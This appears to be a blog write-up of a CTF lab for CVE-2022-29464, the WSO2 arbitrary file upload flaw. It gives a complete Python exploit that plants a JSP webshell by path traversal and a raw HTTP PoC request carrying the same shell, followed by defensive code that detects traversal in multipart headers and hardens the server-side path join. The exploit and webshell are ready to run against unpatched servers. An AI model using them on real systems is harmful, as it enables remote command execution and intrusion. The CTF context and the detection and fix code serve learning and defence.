春秋云镜 CVE-2022-29464 (WSO2 arbitrary file upload vulnerability)


1: Access the target machine:

2: The hint tells us the target has a file upload

3: Two ways to exploit it
1: Use the EXP
```python
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

url = input("Enter the URL: ").rstrip("/")
file = "shell.jsp"
# Minimal JSP webshell: runs the value of the cmd parameter and echoes its stdout.
# Raw string so the "\n" reaches the JSP as a Java escape, not a literal newline.
payload = r"""
<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"\n"; } } catch(IOException e) { e.printStackTrace(); } } %>
<%=output %>
"""

# The multipart field name is used as the on-disk file name without sanitisation,
# so a ../ traversal drops the JSP into the authenticationendpoint webapp directory.
files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": payload}
response = requests.post(f'{url}/fileupload/toolsAny', files=files, verify=False)
print(f"upload status: {response.status_code}")
print(f"shell @ {url}/authenticationendpoint/{file}")
```

Open the shell URL printed above, pass a command in the cmd parameter, and read the flag.

2: Capture the request in Burp and modify the parameters

PoC
```http
POST /fileupload/toolsAny HTTP/1.1
Host: eci-2ze2knq7i9q2kvy9rhta.cloudeci1.ichunqiu.com:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 901
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0

--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"

<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"\n"; } } catch(IOException e) { e.printStackTrace(); } } %>
<%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--
```

After sending the modified request, visit /authenticationendpoint/shell.jsp with a cmd parameter as in the first method.
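Both methods above rely on the same thing: the `name`/`filename` values in the multipart part are written to disk unsanitised, so `../` segments escape the upload directory. The following added example (my own code, not from the original post or from WSO2) shows the request as it goes on the wire, a detector that flags traversal in multipart part headers (the check a WAF or log review would apply), and the hardened server-side join that would have prevented the bug. The boundary value is taken from the PoC above; the base directory `/opt/wso2/tmp` and the JSP body are constructed placeholders.

```python
import posixpath
import re
from typing import List

# Boundary from the PoC; the traversal string is the field name the EXP sends.
BOUNDARY = "4ef9f369a86bfaadf5ec3177278d49c0"
TRAVERSAL_NAME = "../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"


def build_multipart(field_name: str, filename: str, content: bytes, boundary: str = BOUNDARY) -> bytes:
    """Build a single-part multipart/form-data body, the shape requests emits for files={name: data}."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field_name}"; filename="{filename}"\r\n'
        "\r\n"
    ).encode()
    return head + content + f"\r\n--{boundary}--\r\n".encode()


_DISPOSITION_RE = re.compile(rb"Content-Disposition:\s*form-data;(.*)", re.IGNORECASE)
_PARAM_RE = re.compile(rb'(\w+)="([^"]*)"')


def part_names(body: bytes, boundary: str) -> List[str]:
    """Return every name= and filename= value from the Content-Disposition headers in the body."""
    delim = f"--{boundary}".encode()
    names: List[str] = []
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):  # closing delimiter, nothing after it
            break
        headers = part.split(b"\r\n\r\n", 1)[0]
        m = _DISPOSITION_RE.search(headers)
        if not m:
            continue
        for key, value in _PARAM_RE.findall(m.group(1)):
            if key.lower() in (b"name", b"filename"):
                names.append(value.decode("utf-8", "replace"))
    return names


def is_traversal(name: str) -> bool:
    """Strict detector: absolute paths or any '..' segment (either slash style) count as traversal."""
    n = name.replace("\\", "/")
    return n.startswith("/") or ".." in n.split("/")


def flag_upload(body: bytes, boundary: str) -> List[str]:
    """Detection logic: the offending name/filename values in a captured multipart body."""
    return [n for n in part_names(body, boundary) if is_traversal(n)]


def safe_target(base_dir: str, client_name: str) -> str:
    """Hardened server-side join: keep only the last path component and prove the result stays under base_dir.
    base_dir is assumed absolute and already normalised."""
    leaf = posixpath.basename(client_name.replace("\\", "/"))
    if not leaf or leaf in (".", ".."):
        raise ValueError("invalid filename")
    target = posixpath.normpath(posixpath.join(base_dir, leaf))
    if posixpath.commonpath([base_dir, target]) != base_dir:
        raise ValueError("path escapes upload directory")
    return target


if __name__ == "__main__":
    # Constructed sample: same field/filename the EXP sends, placeholder JSP content.
    body = build_multipart(TRAVERSAL_NAME, TRAVERSAL_NAME, b"<%= 1+1 %>")
    print("flagged:", flag_upload(body, BOUNDARY))
    print("hardened save path:", safe_target("/opt/wso2/tmp", TRAVERSAL_NAME))
```

`is_traversal` is deliberately stricter than a normalise-and-compare check: a value like `a/../b` would resolve inside the directory, but no legitimate browser upload ever sends `..` in a part name, so for detection any such segment is worth an alert. `safe_target` is the fix-side counterpart: it throws the client-supplied directory away entirely and then verifies the join, rather than trying to filter `../` out of the string.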



posted @ 2024-09-02 09:00 Crushz